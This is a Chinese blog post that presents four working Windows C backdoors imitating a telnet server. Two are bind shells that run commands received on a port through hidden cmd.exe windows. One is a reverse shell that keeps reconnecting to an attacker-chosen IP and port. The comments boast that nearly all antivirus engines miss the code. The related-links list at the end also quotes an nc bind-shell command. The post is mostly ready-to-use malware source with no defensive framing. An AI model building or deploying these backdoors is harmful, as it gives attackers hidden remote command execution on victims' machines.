仿telnet后门

最新推荐文章于 2021-10-19 16:23:30 发布
最新推荐文章于 2021-10-19 16:23:30 发布
阅读量1k 收藏 1
点赞数
分类专栏: 网络编程
本文为博主原创文章,未经博主允许不得转载。
本文链接:https://blog.csdn.net/liujiayu2/article/details/47356097
版权

先看看一个通过管道实现进程通信的后门


//
//              模仿Telnet(服务器)小程序(单管道版,本地监听24端口)
//
//  病毒检测: 多引擎杀毒只有一款冰岛的杀毒软件查杀其他全过
//
//  客户端  : windows自带telnet客户端 或者 nc 都可以
//
//  小 BUG  : 有的时候不能及时显示命令返回信息,再敲一个回车就可以了,查找原因时
//             每当调试就立即返回信息,去掉断点的话还是得多输入回车,郁闷。
//


#include "stdafx.h"
#include <stdio.h>
#include <windows.h>
#include <winsock.h>
#pragma comment (lib, "Ws2_32")

//这个版本虽然回显不正确,但是仍然可以执行命令
int main(int argc, char* argv[])
{
	//初始化网络库
	WSADATA ws;
	WSAStartup(MAKEWORD(2,2), &ws);

	//socket地址
	struct sockaddr_in CreateAddr;
	struct sockaddr_in AcceptAddr;

	//创建socket
	int CreateSocket = socket(AF_INET, SOCK_STREAM, 0);
	CreateAddr.sin_family = AF_INET;
	CreateAddr.sin_port = htons(24);
	CreateAddr.sin_addr.S_un.S_addr = INADDR_ANY;
	bind(CreateSocket, (struct sockaddr *)&CreateAddr, sizeof(struct sockaddr));

	listen(CreateSocket, 5);
	printf("等待连接中......\n");
	int AcceptAddrSize = sizeof(struct sockaddr_in);
	int AcceptSocket = accept(CreateSocket, (struct sockaddr *)&AcceptAddr, &AcceptAddrSize);

	printf("已有客户端成功连接\n");

	//管道句柄
	HANDLE hReadPipe;
	HANDLE hWritePipe;

	//打开管道
	SECURITY_ATTRIBUTES pipeattr;
	pipeattr.nLength = sizeof(SECURITY_ATTRIBUTES);
	pipeattr.lpSecurityDescriptor = 0;
	pipeattr.bInheritHandle = true;
	BOOL ret_CreatePipe = CreatePipe(&hReadPipe, &hWritePipe, &pipeattr, 0);

	//进程参数
	STARTUPINFO SI;
	memset(&SI, 0, sizeof(SI));
	SI.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
	SI.wShowWindow = SW_HIDE;
	//SI.hStdOutput = SI.hStdError = hWritePipe;
	SI.hStdOutput = hWritePipe;//输出命令执行结果
	SI.hStdInput  = hReadPipe;//获取命令

	//进程信息
	PROCESS_INFORMATION PI;
	char cmdLine[MAX_PATH] = "cmd.exe";
	BOOL ret_CreateProcess = CreateProcess(NULL, cmdLine, NULL, NULL, true, 0, NULL, NULL, &SI, &PI);

	//管道读取缓冲区
	char Buff_peek[MAX_PATH] = {0};
	char Buff_read[MAX_PATH] = {0};

	unsigned long lBytesRead;
	char remoteCommandStr[MAX_PATH] = {0};
	int remoteCommandLen = 0;
	while(1)
	{
		//查询管道内是否有可读数据
		BOOL ret_PeekNamedPipe = PeekNamedPipe(hReadPipe, Buff_peek, MAX_PATH, &lBytesRead, NULL, NULL);

		int ret_send = 0;
		if( lBytesRead )
		{
			BOOL ret_ReadFile = ReadFile(hReadPipe, Buff_read, lBytesRead, &lBytesRead, 0);
			ret_send = send(AcceptSocket, Buff_read, lBytesRead, 0);
		}
		else
		{
			//接收发过来的数据
			char buf[256] = {0};
			int recvCount = recv(AcceptSocket,buf,256,0);

			//telnet工具入口
			if (recvCount==1 || recvCount==2)
			{
				if (!(buf[0]==0x0a && recvCount==1))
				{

				}
				remoteCommandStr[remoteCommandLen++]=buf[0];
				if (recvCount==2 && buf[0]==0x0d && buf[0]==0x0d)
				{
					printf("接受到命令:%s",remoteCommandStr);
					if (strcmp(buf,"exit") == 0 || strcmp(buf,"bye") == 0)
					{
						return 0;
					}

					//执行命令
					_sntprintf(cmdLine,MAX_PATH,"cmd.exe /c %s",remoteCommandStr);
					BOOL ret_CreateProcess = CreateProcess(NULL, cmdLine, NULL, NULL, true, 0, NULL, NULL, &SI, &PI);

					//初始化命令
					remoteCommandLen = 0;
					memset(remoteCommandStr,0,MAX_PATH);
				}
			}
			else if (recvCount>3)//nc工具入口
			{
				//末尾置零
				//buf[recvCount-1]= 0x00;

				//执行命令
				_sntprintf(cmdLine,MAX_PATH,"cmd.exe /c %s",buf);
				BOOL ret_CreateProcess = CreateProcess(NULL, cmdLine, NULL, NULL, true, 0, NULL, NULL, &SI, &PI);

				//初始化命令
				remoteCommandLen = 0;
				memset(remoteCommandStr,0,MAX_PATH);
			}
		}
	}

	return 0;
}
上面的小后门有个缺点就是不能反弹,可能加上lcx就可以反弹了,下面给出一份可以反弹的后门 


//
//              模仿Telnet(服务器)小程序(WSASocket版,反弹式连接)
//
//  病毒检测: 多引擎杀毒只有一款冰岛的杀毒软件查杀其他全过
//
//  客户端  : 反弹式连接,启动时指定控制端地址和端口 telnet serverip serverport
//
//


#include "stdafx.h"
#include <stdio.h>
#include <winsock2.h>
#include <Windows.h>
#pragma comment (lib, "Ws2_32")
//隐藏窗口
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
int main(int argc, char* argv[])
{
	//解析启动参数
	if (argc!=3)
	{
		printf("==================================================\n");
		printf("========usege:telnet serverip serverport=========\n");
		printf("==================================================\n");
		return 0;
	}

	char serverIP[20] = {0};
	int serverPort;
	strncpy(serverIP,argv[1],20);
	serverPort = atoi(argv[2]);

	//初始化网络库
	WSADATA ws;
	SOCKET ConnectSocket;
	WSAStartup(MAKEWORD(2,2), &ws);

	//连接到外网
	struct sockaddr_in server;
	server.sin_family = AF_INET;
	server.sin_port = htons(serverPort);
	server.sin_addr.S_un.S_addr = inet_addr(serverIP);

	//无限循环
	while (1)
	{
		//创建异步套接字
		ConnectSocket = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);

		int ret_con;
		do
		{
			Sleep(1000);
			//连接到控制端
			ret_con = connect(ConnectSocket, (struct sockaddr *)&server, sizeof(server));

		}while (SOCKET_ERROR == ret_con);

		//进程启动参数
		STARTUPINFO SI;
		memset(&SI, 0, sizeof(SI));
		SI.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
		SI.wShowWindow = SW_HIDE;

		//输出信息
		SI.hStdInput = SI.hStdOutput = SI.hStdError = (void *)ConnectSocket;
		PROCESS_INFORMATION PI;
		char cmdLine[] = "cmd.exe";

		//创建进程
		CreateProcess(NULL, cmdLine, NULL, NULL, 1, 0, NULL, NULL, &SI, &PI);
	}
	return 0;
}

下面再给出两个代码,一个双管实现通信的本地监听,一个是无管道本地监听,有了上面两份代码,下面两份代码就没有什么大用,只是做通信练习 

// Server.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <stdio.h>
#include <windows.h>
#include <winsock.h>
#pragma comment (lib, "Ws2_32")

int main(int argc, char* argv[])
{
	WSADATA ws;
	int CreateSocket;
	int AcceptSocket;
	struct sockaddr_in CreateAddr;
	struct sockaddr_in AcceptAddr;

	WSAStartup(MAKEWORD(2,2), &ws);

	CreateSocket = socket(AF_INET, SOCK_STREAM, 0);
	CreateAddr.sin_family = AF_INET;
	CreateAddr.sin_port = htons(12345);
	CreateAddr.sin_addr.S_un.S_addr = INADDR_ANY;
	int ret_bind = bind(CreateSocket, (struct sockaddr *)&CreateAddr, sizeof(struct sockaddr));

	int ret_listen = listen(CreateSocket, 5);
	printf("等待连接中......");
	int AcceptAddrSize;
	AcceptAddrSize = sizeof(struct sockaddr_in);
	AcceptSocket = accept(CreateSocket, (struct sockaddr *)&AcceptAddr, &AcceptAddrSize);

	HANDLE hReadPipe;
	HANDLE hWritePipe;
	HANDLE hReadPipe2;
	HANDLE hWritePipe2;


	SECURITY_ATTRIBUTES pipeattr;
	SECURITY_ATTRIBUTES pipeattr2;

	pipeattr.nLength = 15;
	pipeattr.lpSecurityDescriptor = 0;
	pipeattr.bInheritHandle = true;

	pipeattr2.nLength = 15;
	pipeattr2.lpSecurityDescriptor = 0;
	pipeattr2.bInheritHandle = true;

	CreatePipe(&hReadPipe, &hWritePipe, &pipeattr, 0);
	CreatePipe(&hReadPipe2, &hWritePipe2, &pipeattr2, 0);

	//closesocket( CreateSocket );
	//closesocket( AcceptSocket );

	STARTUPINFO SI;
	memset(&SI, 0, sizeof(SI));
	SI.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
	SI.wShowWindow = SW_HIDE;
	SI.hStdOutput = SI.hStdError = hWritePipe;
	SI.hStdInput = hReadPipe2;

	PROCESS_INFORMATION PI;
	char cmdLine[MAX_PATH] = "cmd.exe";
	CreateProcess(NULL, cmdLine, NULL, NULL, true, 0, NULL, NULL, &SI, &PI);

	char Buff[MAX_PATH];
	unsigned long lBytesRead;
	while(1)
	{
		PeekNamedPipe(hReadPipe, Buff, MAX_PATH, &lBytesRead, NULL, NULL);
		if( lBytesRead )
		{
			ReadFile(hReadPipe, Buff, lBytesRead, &lBytesRead, 0);
			send(AcceptSocket, Buff, lBytesRead, 0);
		}
		else
		{
			lBytesRead = recv(AcceptSocket, Buff, MAX_PATH, 0);
			WriteFile(hWritePipe2, Buff, lBytesRead, &lBytesRead, 0);

		}
	}

	return 0;
}


// Server.cpp : Defines the entry point for the console application.
//

#include <stdio.h>
#include <winsock2.h>
#pragma comment (lib, "Ws2_32")

int main(int argc, char* argv[])
{
	WSADATA ws;
	int CreateSocket;
	int AcceptSocket;
	struct sockaddr_in CreateAddr;
	struct sockaddr_in AcceptAddr;

	WSAStartup(MAKEWORD(2,2), &ws);

	//CreateSocket = socket(AF_INET, SOCK_STREAM, 0);
	CreateSocket = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);
	CreateAddr.sin_family = AF_INET;
	CreateAddr.sin_port = htons(12345);
	CreateAddr.sin_addr.S_un.S_addr = INADDR_ANY;
	bind(CreateSocket, (struct sockaddr *)&CreateAddr, sizeof(struct sockaddr));

	listen(CreateSocket, 5);
	printf("等待连接中......");
	int AcceptAddrSize;
	AcceptAddrSize = sizeof(struct sockaddr_in);
	AcceptSocket = accept(CreateSocket, (struct sockaddr *)&AcceptAddr, &AcceptAddrSize);

	closesocket( CreateSocket );
	//closesocket( AcceptSocket );

	STARTUPINFO SI;
	memset(&SI, 0, sizeof(SI));
	SI.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
	SI.wShowWindow = SW_HIDE;
	SI.hStdInput = SI.hStdOutput = SI.hStdError = (void *)AcceptSocket;


	PROCESS_INFORMATION PI;
	char cmdLine[MAX_PATH] = "cmd.exe";

	CreateProcess(NULL, cmdLine, NULL, NULL, true, 0, NULL, NULL, &SI, &PI);


	return 0;
}



H-KING
关注
专栏目录
H3C路由器低版本通过telnet获取linux权限(调试准备)
qq_32171761的博客
08-03 247
不是每种路由器都能仿真成功,挖掘哪个厂商,最好先买一个这个厂商的二手路由器,作为一个仿真环境,同一个厂商的路由器他们的环境、架构基本差不多。仿真环境因为没有真实的硬件设备,在启动检测时会有各种代码报错问题,比较麻烦。我们测试一下telnet有没有开启成功,windows11安装一下telnet。路由器web系统——>设备管理模块——>远程管理功能——>开启telnet。列出命令,使用debugshell进入。使用默认telnet密码。
网络安全方向相关课题和材料
最新发布
学-> 思->用
10-30 1171
搜集大量网络安全行业开源项目一个是关注互联网企业/团队的安全开源项目,经企业内部实践,这些最佳实践值得借鉴。一个是来自企业安全能力建设的需求,根据需求分类,如WAF、HIDS、Git监控等。这个收集是一个长期的过程,我在GitHub创建了这个项目,专门用来收集一些优秀的甲方安全项目。还有很多很好的免费开源项目可供选择,下面列出的还只是其中很少的一部分,我将持续更新这个项目,欢迎Star。
telnet后门和跳板
05-12
Telnet是传输控制协议/因特网协议(TCP/IP)网络(例如Internet)的登录和仿真程序。它最初是由ARPANET开发的,但是现在它主要用于Internet会话。它的基本功能是,允许用户登录进入远程主机系统。
BIOS中隐藏Telnet后门
03-27 2764
文章属性:原创文章提交:cheng5103 (cheng_5103_at_126.com)[项目简述]     该项目仅为实验性项目,目的是学习国外技术。该项目主要目的是想隐藏一个Telnet后门在主板的BIOS内,并让其随着计算机系统及操作系统成功的运行起来。运行后能反向Telnet连接到指定的计算机接受CMD控制。[关于作者]     姓名:成松林 QQ:179641795 Email:che
Telnet后门和跳板(图)
weixin_33890499的博客
08-08 496
Telnet是传输控制协议/因特网协议(TCP/IP)网络(例如Internet)的登录和仿真程序。它最初是由ARPANET开发的,但是现在它主要用于Internet会话。它的基本功能是,允许用户登录进入远程主机系统。Telnet服务虽然也属于客户机/服务器模型的服务,但它更大的意义在于实现了基于Telnet协议的远程登录(远程交互式计算),Telnet一方面可以用来管理计算...
一个SHELL源码
digwtx的专栏
03-29 1248
#include #include #include #pragma comment(lib, "ws2_32.lib")#pragma comment(lib, "kernel32.lib")#define PORT 23SOCKET ServerSocket = INVALID_SOCKET;SOCKET ClientSocket = INVALID_SOCKET;HANDLE hReadPi
利用Telnet制作完美后门
Wing's Blog
10-11 1842
利用Telnet制作完美后门一、修改本地2003的telnet端口方法:c:/>tlntadmn config port=1023(可以把23改为其它未使用的端口)二、修改远程2003的telnet端口方法c:/>tlntadmn config //192.168.9.1  port=1023 -u administrator -p benet     注://192.168.9.1   对方
VC++分析数据包实现Telnet协议分析
尹成的技术博客
11-07 4416
Telnet协议是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序,用它连接到服务器。终端使用者可以在telnet程序中输入命令,这些命令会在服务器上运行,就像直接在服务器的控制台上输入一样。可以在本地就能控制服务器。要开始一个telnet会话,必须输入用户名和密码来登录服务
ips 测试软件,IPS测试方法.doc
weixin_32659841的博客
07-29 1303
IPS测试方法IPS 测试方法测试集中在三个方面:性能(performance)、精确性(security accuracy)和可用性(usability)。性能(performance)任何一个 IPS 产品应该是可信的,不应该妨碍正常、合理的应用。:IPS产品不会影响正常使用,哪怕在很多新的tcp链接快速建立的时候。同时要传感器 在背景流提高到最大值时有能力检测并阻止攻击数据,减少漏报。设定好...
telnet后门实现代码
10-06
telnet后门实现代码,想学习的兄弟赶快下了
教你建立telnet后门和隐藏用户
10-23
本word教你建立telnet后门和建立超级隐藏用户。
Linux下用C写的一个telnet服务器 源码
05-26
Linux下用C写的一个telnet服务器 源码 无偿奉献出来 欢迎大家下载
网狐6.6缺少内核引擎的代码
10-31
网狐6.6代码是否完整识别方法: 1.检测解决方案里是否有20个工程 常见的是缺少内核引擎和网络组件两个工程,这样对方在编译演示给你看的时候内核引擎和网络组件是没有被编译的。 2.检查共享组件里有没有网络服务组件 有些人的是有网络组件的,如果连这个都没有,那就。。。 如果有,并且编译出来可用,那恭喜你,你还需要修正一个CTCPSocket类的BUG 才算完美。 3.检查服务器组件目录有没有内核引擎组件 如果有先别高兴,看看第4条 4.检查内核引擎是否少文件 检测内核引擎,看里面是否有DataBaseAide.cpp 这是数据库助手类的实现文件。 如果没有那么这个内核引擎就是假冒的,虽然编译能通过,但是不能用。其他的工程连接的时候会报链接错误。 简便办法就是把链接库里的KernelEngine.lib 删掉,把内核引擎重编,再编译登录服务器看是否能通过。 没有内核引擎,和网络服务组件代码会有很大风险, 你知道人家没在里面留什么后门。侯捷说过,代码面前了无秘密就是这个道理。
网狐6.6完整源码+内核源码+105款游戏源码(已解密).zip
05-03
网狐6.6完整源码+内核源码+105款游戏源码(已解密)
【愚公系列】2023年04月 FTP及Telnet弱口令渗透测试之Telnet后门种植
热门推荐
时光隧道
08-23 5万+
Telnet是一项用于远程登录到计算机网络的协议。telnet [IP地址] [端口号]: Telnet连接到指定IP地址和端口号。quit: 退出Telnet连接。logout: 注销当前用户。ctrl + ]: 进入Telnet命令控制器。?或 help: 显示可用的Telnet命令帮助。open [IP地址]: 向指定IP地址打开Telnet连接。close: 关闭当前Telnet连接。display / terminal: 显示当前终端的属性和特性。
批处理开启TelNet后门
02-07 1418
<br />@echo off title 生成Telnet远程登录 setlocal enabledelayedexpansion if not exist "%windir%/system32/tlntsvr.exe" ( echo 找不到Telnet服务文件,请退出 pause exit ) sc config tlntsvr start= auto sc start tlntsvr cls :a set /p user=请输入用
系统后门种植实验-TELNET
qq_45768092的博客
10-19 454
系统后门种植实验-TELNET 后门是攻击者在入侵了计算机以后为了以后能方便的进入该计算机而进行的系统设置或安装的一类软件,一般是指那些绕过安全性控制而获取对程序或系统访问权的程序或方法,要求有很强的隐蔽性。其用途在于潜伏在电脑中,从事搜集信息或便于黑客进入的动作,它是一种登录系统的方法,不仅绕过系统已有的安全设置,而且还能挫败系统上各种增强的安全设置。简单的后门可能只是建立一个新的账号,或者接管一个很少使用的账号;复杂的后门利用系统服务或其他工具,可能会绕过系统的安全认证而对系统有安全存取权。 实验简介
Bind后门
jahn的专栏
11-08 484
 Bind后门.体积仅有629字节!!!!支持多用户登录,多线程支持!!!屏蔽了.安装,过主防等危害功能...主页:www.eviloctal.comEmail:Anskya[AT]Gmail.comAnskya 加入E.S.T第一个作品,请大家多多支持和帮助我感谢曾经帮助过和支持过我的朋友们,谢谢大家!!!啊哈哈~不好意思实在不知道说什么好...最近捣鼓PE融缩技术...nasm的编译器
利用nc构建telnet后门控制案例
kf的专栏
02-03 795
nc俗称为网络中的“瑞士军刀”其功能强大,如果在肉鸡上运行“nc.exe –p port –L –d –e cmd.exe”命令就可以构建一个telnet后门,即使关闭了nc.exe程序运行窗口,该后门程序还继续存在。本案例通过一个bat文件来构建一个telnet后门,当系统重新启动后,该后门会继续存在。当然nc还有许多其它用法:   (1)连接到REMOTE主机,格式:nc -nvv 192.
Telnet后门与超市管理系统开发:Java+JDBC实战
本文主要讨论了如何利用Telnet作为工具在IT安全领域的两个应用:后门和跳板。首先,让我们理解一下Telnet的基本概念。Telnet是一种远程登录协议,最初由ARPANET开发,用于在互联网上进行远程系统访问。它的基础功能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值